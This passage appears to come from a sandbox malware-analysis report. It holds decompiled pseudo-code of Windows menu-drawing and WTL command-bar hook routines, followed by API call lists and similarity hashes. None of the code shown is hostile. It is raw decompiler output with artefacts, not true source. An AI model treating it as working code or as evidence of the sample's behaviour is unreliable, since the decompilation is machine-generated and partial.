                                                                                                                                                                                                                                                                                          					if(_t60 != 0x10001) {
                                                                                                                                                                                                                                                                                          						L17:
                                                                                                                                                                                                                                                                                          						return E001059E6(0, _t89, _v8 ^ _t125, _t106, 0, _t123);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						if(( *(__ebx + 0x85) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          							if(( *(__ebx + 0x84) & 0x00000080) == 0) {
                                                                                                                                                                                                                                                                                          								 *(_t123 + 0x3c) = GetSysColor(0x11);
                                                                                                                                                                                                                                                                                          								 *_v216 = 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t65 =  *(__edx + 0x28);
                                                                                                                                                                                                                                                                                          							if((_t65 & 0 | (_t65 & 0x00000004) == 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          								L8:
                                                                                                                                                                                                                                                                                          								 *(_t123 + 0x3c) = GetSysColor(0x11);
                                                                                                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if((_t65 & 0x00000041) == 0) {
                                                                                                                                                                                                                                                                                          									if(( *(__ebx + 0x84) & 0x00000080) == 0) {
                                                                                                                                                                                                                                                                                          										goto L8;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t122 = __edx + 0x14;
                                                                                                                                                                                                                                                                                          									FillRect( *(_t123 + 0x10), _t122, GetSysColorBrush(0x1d));
                                                                                                                                                                                                                                                                                          									FrameRect( *(_t123 + 0x10), _t122, GetSysColorBrush(0xd));
                                                                                                                                                                                                                                                                                          									asm("sbb edx, edx");
                                                                                                                                                                                                                                                                                          									 *(_t123 + 0x3c) = GetSysColor(( ~( *(__ebx + 0x84) & 0x80) & 0xfffffffd) + 0x11);
                                                                                                                                                                                                                                                                                          									L9:
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t121 =  *(_t123 + 0x10);
                                                                                                                                                                                                                                                                                          							SetTextColor(_t121,  *(_t123 + 0x3c));
                                                                                                                                                                                                                                                                                          							SetBkMode(_t121,  *(_t123 + 0x64));
                                                                                                                                                                                                                                                                                          							_t70 = SendMessageA( *(_t89 + 4), 0x31, 0, 0);
                                                                                                                                                                                                                                                                                          							_v224 = _t70;
                                                                                                                                                                                                                                                                                          							_v220 = 0;
                                                                                                                                                                                                                                                                                          							if(_t70 != 0) {
                                                                                                                                                                                                                                                                                          								_v220 = SelectObject(_t121, _t70);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v212 = 0;
                                                                                                                                                                                                                                                                                          							E00106820( &_v211, 0, 0xc7);
                                                                                                                                                                                                                                                                                          							_v252 = 0;
                                                                                                                                                                                                                                                                                          							_v232 = 0;
                                                                                                                                                                                                                                                                                          							_v228 = 0;
                                                                                                                                                                                                                                                                                          							_v248 = 0;
                                                                                                                                                                                                                                                                                          							_v244 = 0;
                                                                                                                                                                                                                                                                                          							_v240 = 0;
                                                                                                                                                                                                                                                                                          							_v236 = 0;
                                                                                                                                                                                                                                                                                          							_v232 =  &_v212;
                                                                                                                                                                                                                                                                                          							_v256 = 0x20;
                                                                                                                                                                                                                                                                                          							_v252 = 2;
                                                                                                                                                                                                                                                                                          							_v228 = 0xc8;
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t89 + 4), 0x441,  *(_t123 + 0x24),  &_v256);
                                                                                                                                                                                                                                                                                          							_t124 = _t123 + 0x14;
                                                                                                                                                                                                                                                                                          							DrawTextA(_t121,  &_v212, 0xffffffff, _t123 + 0x14,  !(( *(_t89 + 0x85) & 0x000000ff) << 0x12) & 0x00100000 | 0x00000025);
                                                                                                                                                                                                                                                                                          							if(_v224 != 0) {
                                                                                                                                                                                                                                                                                          								SelectObject(_t121, _v220);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							 *_v216 = 1;
                                                                                                                                                                                                                                                                                          							return E001059E6(4, _t89, _v8 ^ _t125, _v216, _t121, _t124);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *__ecx = 1;
                                                                                                                                                                                                                                                                                          					return E001059E6(0x20, __ebx, _v8 ^ _t125, __edx, 0, __edx);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}


























                                                                                                                                                                                                                                                                                          0x000ff090
                                                                                                                                                                                                                                                                                          0x000ff090
                                                                                                                                                                                                                                                                                          0x000ff099
                                                                                                                                                                                                                                                                                          0x000ff0a0
                                                                                                                                                                                                                                                                                          0x000ff0a4
                                                                                                                                                                                                                                                                                          0x000ff0a6
                                                                                                                                                                                                                                                                                          0x000ff0ac
                                                                                                                                                                                                                                                                                          0x000ff0b5
                                                                                                                                                                                                                                                                                          0x000ff0d5
                                                                                                                                                                                                                                                                                          0x000ff2b0
                                                                                                                                                                                                                                                                                          0x000ff2c1
                                                                                                                                                                                                                                                                                          0x000ff0db
                                                                                                                                                                                                                                                                                          0x000ff0e2
                                                                                                                                                                                                                                                                                          0x000ff297
                                                                                                                                                                                                                                                                                          0x000ff2a1
                                                                                                                                                                                                                                                                                          0x000ff2aa
                                                                                                                                                                                                                                                                                          0x000ff2aa
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff0e8
                                                                                                                                                                                                                                                                                          0x000ff0e8
                                                                                                                                                                                                                                                                                          0x000ff0f8
                                                                                                                                                                                                                                                                                          0x000ff14b
                                                                                                                                                                                                                                                                                          0x000ff153
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff0fa
                                                                                                                                                                                                                                                                                          0x000ff0fc
                                                                                                                                                                                                                                                                                          0x000ff149
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff0fe
                                                                                                                                                                                                                                                                                          0x000ff100
                                                                                                                                                                                                                                                                                          0x000ff10f
                                                                                                                                                                                                                                                                                          0x000ff123
                                                                                                                                                                                                                                                                                          0x000ff137
                                                                                                                                                                                                                                                                                          0x000ff153
                                                                                                                                                                                                                                                                                          0x000ff14d
                                                                                                                                                                                                                                                                                          0x000ff153
                                                                                                                                                                                                                                                                                          0x000ff0fc
                                                                                                                                                                                                                                                                                          0x000ff159
                                                                                                                                                                                                                                                                                          0x000ff15e
                                                                                                                                                                                                                                                                                          0x000ff169
                                                                                                                                                                                                                                                                                          0x000ff179
                                                                                                                                                                                                                                                                                          0x000ff17f
                                                                                                                                                                                                                                                                                          0x000ff185
                                                                                                                                                                                                                                                                                          0x000ff191
                                                                                                                                                                                                                                                                                          0x000ff19b
                                                                                                                                                                                                                                                                                          0x000ff19b
                                                                                                                                                                                                                                                                                          0x000ff1af
                                                                                                                                                                                                                                                                                          0x000ff1b6
                                                                                                                                                                                                                                                                                          0x000ff1c0
                                                                                                                                                                                                                                                                                          0x000ff1c6
                                                                                                                                                                                                                                                                                          0x000ff1cc
                                                                                                                                                                                                                                                                                          0x000ff1d9
                                                                                                                                                                                                                                                                                          0x000ff1df
                                                                                                                                                                                                                                                                                          0x000ff1e5
                                                                                                                                                                                                                                                                                          0x000ff1eb
                                                                                                                                                                                                                                                                                          0x000ff1fb
                                                                                                                                                                                                                                                                                          0x000ff20a
                                                                                                                                                                                                                                                                                          0x000ff214
                                                                                                                                                                                                                                                                                          0x000ff21e
                                                                                                                                                                                                                                                                                          0x000ff228
                                                                                                                                                                                                                                                                                          0x000ff244
                                                                                                                                                                                                                                                                                          0x000ff252
                                                                                                                                                                                                                                                                                          0x000ff25f
                                                                                                                                                                                                                                                                                          0x000ff269
                                                                                                                                                                                                                                                                                          0x000ff269
                                                                                                                                                                                                                                                                                          0x000ff27a
                                                                                                                                                                                                                                                                                          0x000ff28f
                                                                                                                                                                                                                                                                                          0x000ff28f
                                                                                                                                                                                                                                                                                          0x000ff0e2
                                                                                                                                                                                                                                                                                          0x000ff0b7
                                                                                                                                                                                                                                                                                          0x000ff0ba
                                                                                                                                                                                                                                                                                          0x000ff0cf
                                                                                                                                                                                                                                                                                          0x000ff0cf

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000001D), ref: 000FF103
                                                                                                                                                                                                                                                                                          • FillRect.USER32 ref: 000FF10F
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000D), ref: 000FF117
                                                                                                                                                                                                                                                                                          • FrameRect.USER32 ref: 000FF123
                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(00000011), ref: 000FF14D
                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 000FF15E
                                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 000FF169
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 000FF179
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 000FF195
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FF1B6
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000441,?,?), ref: 000FF228
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Color$BrushMessageRectSend$FillFrameModeObjectSelectText_memset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3018652888-3916222277
                                                                                                                                                                                                                                                                                          • Opcode ID: 527b4b40da63abe4422389110b499b9e4aa7e8e86e76e16d3ca24553bd313cb5
                                                                                                                                                                                                                                                                                          • Instruction ID: 4a4096b89fbcd5db49d4e3e6133323f79ff71143be42c322021008f6e8400c62
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 527b4b40da63abe4422389110b499b9e4aa7e8e86e76e16d3ca24553bd313cb5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC51A0719002199FDB65CF64CD45BFEBBF4BF88310F0081AAEA49A6680DBB45984DF60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                          			E00100AF0(void* __ecx, void* __esi, int _a4, int _a8, long _a12) {
                                                                                                                                                                                                                                                                                          				signed char _v0;
                                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v32;
                                                                                                                                                                                                                                                                                          				long _v36;
                                                                                                                                                                                                                                                                                          				long _v40;
                                                                                                                                                                                                                                                                                          				struct tagPOINT _v48;
                                                                                                                                                                                                                                                                                          				long _v52;
                                                                                                                                                                                                                                                                                          				long _v56;
                                                                                                                                                                                                                                                                                          				long _v60;
                                                                                                                                                                                                                                                                                          				long _v64;
                                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                                          				int _v72;
                                                                                                                                                                                                                                                                                          				int _v76;
                                                                                                                                                                                                                                                                                          				int _v80;
                                                                                                                                                                                                                                                                                          				int _v84;
                                                                                                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                                                                                                          				int _v92;
                                                                                                                                                                                                                                                                                          				struct tagMSG _v116;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				long _t113;
                                                                                                                                                                                                                                                                                          				signed int _t114;
                                                                                                                                                                                                                                                                                          				int _t129;
                                                                                                                                                                                                                                                                                          				signed int _t133;
                                                                                                                                                                                                                                                                                          				long _t144;
                                                                                                                                                                                                                                                                                          				signed char _t146;
                                                                                                                                                                                                                                                                                          				void* _t148;
                                                                                                                                                                                                                                                                                          				int _t152;
                                                                                                                                                                                                                                                                                          				intOrPtr _t168;
                                                                                                                                                                                                                                                                                          				int _t173;
                                                                                                                                                                                                                                                                                          				void* _t182;
                                                                                                                                                                                                                                                                                          				void* _t183;
                                                                                                                                                                                                                                                                                          				void* _t185;
                                                                                                                                                                                                                                                                                          				intOrPtr _t186;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _t187;
                                                                                                                                                                                                                                                                                          				signed int _t192;
                                                                                                                                                                                                                                                                                          				int _t206;
                                                                                                                                                                                                                                                                                          				struct HHOOK__** _t211;
                                                                                                                                                                                                                                                                                          				intOrPtr _t215;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t233;
                                                                                                                                                                                                                                                                                          				int _t234;
                                                                                                                                                                                                                                                                                          				int _t235;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t236;
                                                                                                                                                                                                                                                                                          				signed int _t237;
                                                                                                                                                                                                                                                                                          				signed int _t238;
                                                                                                                                                                                                                                                                                          				void* _t239;
                                                                                                                                                                                                                                                                                          				void* _t240;
                                                                                                                                                                                                                                                                                          				void* _t241;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t243;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t246;
                                                                                                                                                                                                                                                                                          				struct HWND__** _t248;
                                                                                                                                                                                                                                                                                          				intOrPtr _t249;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _t250;
                                                                                                                                                                                                                                                                                          				intOrPtr _t251;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _t252;
                                                                                                                                                                                                                                                                                          				signed int _t255;
                                                                                                                                                                                                                                                                                          				signed int _t256;
                                                                                                                                                                                                                                                                                          				void* _t262;
                                                                                                                                                                                                                                                                                          				intOrPtr _t271;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t256 = _t255 & 0xfffffff8;
                                                                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 && _a8 == 1) {
                                                                                                                                                                                                                                                                                          					if( *0x1719a8 == 0) {
                                                                                                                                                                                                                                                                                          						_t251 =  *0x17196c; // 0x1719bc
                                                                                                                                                                                                                                                                                          						_t252 = _t251 + 0x10;
                                                                                                                                                                                                                                                                                          						EnterCriticalSection(_t252);
                                                                                                                                                                                                                                                                                          						if( *0x1719a8 == 0) {
                                                                                                                                                                                                                                                                                          							 *0x1719a8 = RegisterWindowMessageA("WTL_CmdBar_InternalGetBarMsg");
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						LeaveCriticalSection(_t252);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t168 =  *((intOrPtr*)(_a12 + 4));
                                                                                                                                                                                                                                                                                          					_t262 = _t168 -  *0x1719a8; // 0x0
                                                                                                                                                                                                                                                                                          					if(_t262 != 0 && _t168 != 0x37f) {
                                                                                                                                                                                                                                                                                          						_t243 =  *_a12;
                                                                                                                                                                                                                                                                                          						_t248 = 0;
                                                                                                                                                                                                                                                                                          						_v8 = 0;
                                                                                                                                                                                                                                                                                          						while(_t243 != 0) {
                                                                                                                                                                                                                                                                                          							if( *0x1719a8 == 0) {
                                                                                                                                                                                                                                                                                          								_t249 =  *0x17196c; // 0x1719bc
                                                                                                                                                                                                                                                                                          								_t250 = _t249 + 0x10;
                                                                                                                                                                                                                                                                                          								EnterCriticalSection(_t250);
                                                                                                                                                                                                                                                                                          								if( *0x1719a8 == 0) {
                                                                                                                                                                                                                                                                                          									 *0x1719a8 = RegisterWindowMessageA("WTL_CmdBar_InternalGetBarMsg");
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								LeaveCriticalSection(_t250);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t173 =  *0x1719a8; // 0x0
                                                                                                                                                                                                                                                                                          							_t248 = SendMessageA(_t243, _t173,  &_v8, 0);
                                                                                                                                                                                                                                                                                          							_t243 = GetParent(_t243);
                                                                                                                                                                                                                                                                                          							if(_t248 == 0) {
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								L17:
                                                                                                                                                                                                                                                                                          								if(_v8 == GetCurrentProcessId()) {
                                                                                                                                                                                                                                                                                          									_t248[7] =  *_a12;
                                                                                                                                                                                                                                                                                          									if(IsWindow( *_t248) != 0) {
                                                                                                                                                                                                                                                                                          										SendMessageA( *_t248, 0x37f, 0, _a12);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(_t248 != 0) {
                                                                                                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L20:
                                                                                                                                                                                                                                                                                          				_t271 =  *0x171994; // 0x0
                                                                                                                                                                                                                                                                                          				if(_t271 == 0) {
                                                                                                                                                                                                                                                                                          					L25:
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t113 = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          					_t233 =  *0x171994; // 0x0
                                                                                                                                                                                                                                                                                          					_t215 =  *((intOrPtr*)(_t233 + 8));
                                                                                                                                                                                                                                                                                          					_t192 = 0;
                                                                                                                                                                                                                                                                                          					if(_t215 <= 0) {
                                                                                                                                                                                                                                                                                          						goto L25;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t246 =  *_t233;
                                                                                                                                                                                                                                                                                          						while( *_t246 != _t113) {
                                                                                                                                                                                                                                                                                          							_t192 = _t192 + 1;
                                                                                                                                                                                                                                                                                          							_t246 = _t246 + 4;
                                                                                                                                                                                                                                                                                          							if(_t192 < _t215) {
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								goto L25;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L55;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(_t192 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          							goto L25;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							if(_t192 < 0 || _t192 >= _t215) {
                                                                                                                                                                                                                                                                                          								RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								_t254 = _t256;
                                                                                                                                                                                                                                                                                          								_t114 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          								_v32.left = _t114 ^ _t256;
                                                                                                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                                                                                                          								_push(_t233);
                                                                                                                                                                                                                                                                                          								_v48.x = 0;
                                                                                                                                                                                                                                                                                          								_v48.y = 0;
                                                                                                                                                                                                                                                                                          								_v40 = 0;
                                                                                                                                                                                                                                                                                          								_v36 = 0;
                                                                                                                                                                                                                                                                                          								_t234 = _t192;
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t246 + 4), 0x41d, _t234,  &_v48);
                                                                                                                                                                                                                                                                                          								_v116.time.x = _v48.x;
                                                                                                                                                                                                                                                                                          								_v116.pt.x = _v36;
                                                                                                                                                                                                                                                                                          								MapWindowPoints( *(_t246 + 4), 0,  &(_v116.time), 1);
                                                                                                                                                                                                                                                                                          								MapWindowPoints( *(_t246 + 4), 0,  &_v48, 2);
                                                                                                                                                                                                                                                                                          								_v64 = 0;
                                                                                                                                                                                                                                                                                          								_v60 = 0;
                                                                                                                                                                                                                                                                                          								_v56 = 0;
                                                                                                                                                                                                                                                                                          								_v52 = 0;
                                                                                                                                                                                                                                                                                          								_v60 = _v48.y;
                                                                                                                                                                                                                                                                                          								_v64 = _v48.x;
                                                                                                                                                                                                                                                                                          								_v68 = 0x14;
                                                                                                                                                                                                                                                                                          								_v56 = _v40;
                                                                                                                                                                                                                                                                                          								_v52 = _v36;
                                                                                                                                                                                                                                                                                          								_v116.lParam = GetSubMenu( *(_t246 + 0x44), _t234);
                                                                                                                                                                                                                                                                                          								_v88 = 0;
                                                                                                                                                                                                                                                                                          								_v84 = 0;
                                                                                                                                                                                                                                                                                          								_v80 = 0;
                                                                                                                                                                                                                                                                                          								_v76 = 0;
                                                                                                                                                                                                                                                                                          								_v72 = 0;
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t246 + 4), 0x417, _t234,  &_v88);
                                                                                                                                                                                                                                                                                          								_t129 = _v84;
                                                                                                                                                                                                                                                                                          								_v92 = _t129;
                                                                                                                                                                                                                                                                                          								 *(_t246 + 0x88) = _t234;
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t246 + 4), 0x403, _t129, 1);
                                                                                                                                                                                                                                                                                          								_t235 = _v92;
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t246 + 4), 0x448, _t235, 0);
                                                                                                                                                                                                                                                                                          								if( *0x1719a0 == 0) {
                                                                                                                                                                                                                                                                                          									_t133 = 0;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          									_t133 = ( ~(_v0 & 0x000000ff) & 0xffffd000) + 0x4000;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								E000FF7B0( &_v52, _v80, _t246, _v88, _t133 | 0x00000040, _v84);
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t246 + 4), 0x403, _t235, 0);
                                                                                                                                                                                                                                                                                          								_t236 =  *(_t246 + 4);
                                                                                                                                                                                                                                                                                          								if(GetFocus() != _t236) {
                                                                                                                                                                                                                                                                                          									SendMessageA(_t236, 0x448, 0xffffffff, 0);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t223 =  *(_t246 + 4);
                                                                                                                                                                                                                                                                                          								_t237 = PeekMessageA;
                                                                                                                                                                                                                                                                                          								_v116.hwnd = 0;
                                                                                                                                                                                                                                                                                          								_v116.message = 0;
                                                                                                                                                                                                                                                                                          								_v116.wParam = 0;
                                                                                                                                                                                                                                                                                          								_v116.lParam = 0;
                                                                                                                                                                                                                                                                                          								_v116.time.x = 0;
                                                                                                                                                                                                                                                                                          								_v116.pt.x = 0;
                                                                                                                                                                                                                                                                                          								_v92 = 0;
                                                                                                                                                                                                                                                                                          								 *(_t246 + 0x88) = 0xffffffff;
                                                                                                                                                                                                                                                                                          								if(PeekMessageA( &_v116,  *(_t246 + 4), 0x201, 0x201, 0) != 0) {
                                                                                                                                                                                                                                                                                          									_t223 = _v116.pt.x;
                                                                                                                                                                                                                                                                                          									_push(_v92);
                                                                                                                                                                                                                                                                                          									if(PtInRect( &_v32, _v116.pt.x) != 0) {
                                                                                                                                                                                                                                                                                          										_t223 =  &_v116;
                                                                                                                                                                                                                                                                                          										PeekMessageA( &_v116,  *(_t246 + 4), 0x201, 0x201, 1);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t238 = _t237 | 0xffffffff;
                                                                                                                                                                                                                                                                                          								if( *(_t246 + 0x8c) == _t238) {
                                                                                                                                                                                                                                                                                          									 *(_t246 + 0x84) =  *(_t246 + 0x84) & 0x000000ef;
                                                                                                                                                                                                                                                                                          									if(( *(_t246 + 0x84) & 0x00000020) != 0) {
                                                                                                                                                                                                                                                                                          										SendMessageA( *(_t246 + 4), 0x448, _v76, 0);
                                                                                                                                                                                                                                                                                          										_t144 = SendMessageA( *(_t246 + 4), 0x449, 1, 0);
                                                                                                                                                                                                                                                                                          										_pop(_t239);
                                                                                                                                                                                                                                                                                          										_pop(_t182);
                                                                                                                                                                                                                                                                                          										return E001059E6(_t144, _t182, _v16 ^ _t254,  *(_t246 + 4), _t239, _t246);
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t146 =  *(_t246 + 0x85);
                                                                                                                                                                                                                                                                                          										if((_t146 & 0x00000002) != 0 && (_t146 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          											 *(_t246 + 0x85) = _t146 & 0x000000f7;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										_t148 = E00101570(_t246, _t238);
                                                                                                                                                                                                                                                                                          										_pop(_t240);
                                                                                                                                                                                                                                                                                          										_pop(_t183);
                                                                                                                                                                                                                                                                                          										return E001059E6(_t148, _t183, _v16 ^ _t254, _t223, _t240, _t246);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									if( *0x1719a4 == 0) {
                                                                                                                                                                                                                                                                                          										_t186 =  *0x17196c; // 0x1719bc
                                                                                                                                                                                                                                                                                          										_t187 = _t186 + 0x10;
                                                                                                                                                                                                                                                                                          										EnterCriticalSection(_t187);
                                                                                                                                                                                                                                                                                          										if( *0x1719a4 == 0) {
                                                                                                                                                                                                                                                                                          											 *0x1719a4 = RegisterWindowMessageA("WTL_CmdBar_InternalAutoPopupMsg");
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										LeaveCriticalSection(_t187);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t206 =  *0x1719a4; // 0x0
                                                                                                                                                                                                                                                                                          									_t225 =  *(_t246 + 4);
                                                                                                                                                                                                                                                                                          									_t152 = PostMessageA( *(_t246 + 4), _t206,  *(_t246 + 0x8c) & 0x0000ffff, 0);
                                                                                                                                                                                                                                                                                          									if(( *(_t246 + 0x8c) & 0xffff0000) == 0 && ( *(_t246 + 0x84) & 0x00000008) == 0) {
                                                                                                                                                                                                                                                                                          										_t152 = PostMessageA( *(_t246 + 4), 0x100, 0x28, 0);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									 *(_t246 + 0x8c) = _t238;
                                                                                                                                                                                                                                                                                          									_pop(_t241);
                                                                                                                                                                                                                                                                                          									_pop(_t185);
                                                                                                                                                                                                                                                                                          									return E001059E6(_t152, _t185, _v16 ^ _t254, _t225, _t241, _t246);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t211 =  *( *((intOrPtr*)(_t233 + 4)) + _t192 * 4);
                                                                                                                                                                                                                                                                                          								if(_t211 == 0) {
                                                                                                                                                                                                                                                                                          									goto L25;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									return CallNextHookEx( *_t211, _a4, _a8, _a12);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L55:
                                                                                                                                                                                                                                                                                          			}































































                                                                                                                                                                                                                                                                                          0x00100af3
                                                                                                                                                                                                                                                                                          0x00100af6
                                                                                                                                                                                                                                                                                          0x00100afc
                                                                                                                                                                                                                                                                                          0x00100afe
                                                                                                                                                                                                                                                                                          0x00100b15
                                                                                                                                                                                                                                                                                          0x00100b17
                                                                                                                                                                                                                                                                                          0x00100b1d
                                                                                                                                                                                                                                                                                          0x00100b21
                                                                                                                                                                                                                                                                                          0x00100b2e
                                                                                                                                                                                                                                                                                          0x00100b3b
                                                                                                                                                                                                                                                                                          0x00100b3b
                                                                                                                                                                                                                                                                                          0x00100b41
                                                                                                                                                                                                                                                                                          0x00100b41
                                                                                                                                                                                                                                                                                          0x00100b4a
                                                                                                                                                                                                                                                                                          0x00100b4d
                                                                                                                                                                                                                                                                                          0x00100b53
                                                                                                                                                                                                                                                                                          0x00100b67
                                                                                                                                                                                                                                                                                          0x00100b6f
